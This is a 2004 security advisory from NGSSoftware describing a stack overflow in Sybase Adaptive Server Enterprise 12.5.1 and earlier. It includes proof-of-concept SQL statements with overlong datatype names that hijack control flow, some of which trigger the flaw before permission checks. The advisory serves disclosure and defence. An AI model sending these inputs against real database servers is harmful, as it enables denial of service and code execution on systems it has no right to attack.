NGSSoftware Insight Security Research Advisory
Name: Sybase ASE convert overflow
Systems Affected: Sybase Adaptive Server Enterprise 12.5.1 and lower
Severity: High
Vendor URL: http://www.sybase.com
Author: Sherief Hammad [ sherief@ngssoftware.com ]
Date of Technical Advisory: 25th June 2004
Details
There is an exploitable stack overflow in the Sybase handling of bespoke datatypes. Any SQL statement which as part of it syntax defines a datatype is vulnerable to this overflow. Access to these functions cannot be prohibited.
The bug can be observed by starting the Sybase server, attaching a debugger and then running the SQL statement:
declare @foo ‘AAAA…..AAAA’
9600 A’s is sufficient to cause the flow of control to be directed to the address 0x41414141(‘AAAA’ in hex) on a WindowsXP platform.
Other attack vectors to the same code are;
declare var1 ‘lotsofAs’
create table #foo (col1 ‘lotsofAs’)
alter table master.dbo.sysobjects add col1 ‘lotsofAs’
NB. breaks before checking perms
This obviously works with modify and add
create function foo ( var1 ‘lotsofAs’) reutrns int language java parameter
style java external name ‘java.test’
create function foo ( var1 int) reutrns ‘lotsofAs’ language java parameter
style java external name ‘java.test’
NB. breaks before checking perms
create procedure foo @var1 ‘lotsofAs’ as return 0
NB. breaks before checking perms
Fix Information
The vendor has not yet confirmed the existence of the bug.
About NGSSoftware
NGSSoftware design, research and develop intelligent, advanced application
security assessment scanners. Based in the United Kingdom, NGSSoftware have
offices in the South of London and the East Coast of Scotland. NGSSoftware’s
sister company NGSConsulting, offers best of breed security consulting
services, specializing in application, host and network security
assessments.
Telephone +44 208 401 0070
Fax +44 208 401 0076
enquiries@ngssoftware.com
